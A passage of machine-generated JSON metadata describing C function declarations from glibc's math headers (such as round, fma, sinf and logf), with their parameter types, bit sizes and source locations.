64 } }, { "tag": "function", "name": "round", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:298:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:298:14>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__round", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:298:1 <Spelling=<scratch space>:127:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "trunc", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:302:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:302:14>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__trunc", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:302:1 <Spelling=<scratch space>:128:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "remquo", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:307:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:307:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__quo", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__remquo", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:307:1 <Spelling=<scratch space>:129:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__quo", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "lrint", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:314:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:314:22>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__lrint", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:314:1 <Spelling=<scratch space>:130:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "llrint", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:316:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:316:27>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__llrint", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:316:1 <Spelling=<scratch space>:131:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "lround", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:320:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:320:22>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__lround", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:320:1 <Spelling=<scratch space>:132:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "llround", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:322:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:322:27>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__llround", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:322:1 <Spelling=<scratch space>:133:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "fdim", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:326:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:326:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__fdim", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:326:1 <Spelling=<scratch space>:134:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "fmax", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:329:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:329:14>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__fmax", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:329:1 <Spelling=<scratch space>:135:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "fmin", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:332:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:332:14>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__fmin", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:332:1 <Spelling=<scratch space>:136:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "fma", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:335:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:335:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__z", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__fma", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:335:1 <Spelling=<scratch space>:137:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__z", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "scalb", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:396:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:396:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__scalb", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:396:1 <Spelling=<scratch space>:139:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__fpclassifyf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:21:1 <Spelling=<scratch space>:140:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__signbitf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:25:1 <Spelling=<scratch space>:141:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__isinff", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:30:1 <Spelling=<scratch space>:142:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__finitef", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:33:1 <Spelling=<scratch space>:143:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__isnanf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:36:1 <Spelling=<scratch space>:144:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__iseqsigf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:39:1 <Spelling=<scratch space>:145:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__issignalingf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls-helper-functions.h:42:1 <Spelling=<scratch space>:146:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "acosf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:53:1 <Spelling=<scratch space>:147:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__acosf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:53:1 <Spelling=<scratch space>:149:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "asinf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:55:1 <Spelling=<scratch space>:150:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__asinf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:55:1 <Spelling=<scratch space>:152:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "atanf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:57:1 <Spelling=<scratch space>:153:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__atanf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:57:1 <Spelling=<scratch space>:155:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "atan2f", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:59:1 <Spelling=<scratch space>:156:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__atan2f", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:59:1 <Spelling=<scratch space>:158:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__y", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "cosf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:62:1 <Spelling=<scratch space>:161:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__cosf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:62:1 <Spelling=<scratch space>:163:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "sinf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:64:1 <Spelling=<scratch space>:166:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__sinf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:64:1 <Spelling=<scratch space>:168:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "tanf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:66:1 <Spelling=<scratch space>:169:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__tanf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:66:1 <Spelling=<scratch space>:171:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "coshf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:71:1 <Spelling=<scratch space>:172:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__coshf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:71:1 <Spelling=<scratch space>:174:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "sinhf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:73:1 <Spelling=<scratch space>:175:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__sinhf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:73:1 <Spelling=<scratch space>:177:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "tanhf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:75:1 <Spelling=<scratch space>:178:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__tanhf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:75:1 <Spelling=<scratch space>:180:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "acoshf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:85:1 <Spelling=<scratch space>:181:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__acoshf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:85:1 <Spelling=<scratch space>:183:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "asinhf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:87:1 <Spelling=<scratch space>:184:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__asinhf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:87:1 <Spelling=<scratch space>:186:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "atanhf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:89:1 <Spelling=<scratch space>:187:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__atanhf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:89:1 <Spelling=<scratch space>:189:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "expf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:95:1 <Spelling=<scratch space>:192:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__expf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:95:1 <Spelling=<scratch space>:194:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "frexpf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:98:1 <Spelling=<scratch space>:195:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__exponent", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__frexpf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:98:1 <Spelling=<scratch space>:197:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__exponent", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "ldexpf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:101:1 <Spelling=<scratch space>:198:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__exponent", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__ldexpf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:101:1 <Spelling=<scratch space>:200:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__exponent", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "logf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:104:1 <Spelling=<scratch space>:203:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__logf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:104:1 <Spelling=<scratch space>:205:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "log10f", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:107:1 <Spelling=<scratch space>:206:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__log10f", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:107:1 <Spelling=<scratch space>:208:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "modff", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:110:1 <Spelling=<scratch space>:209:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { 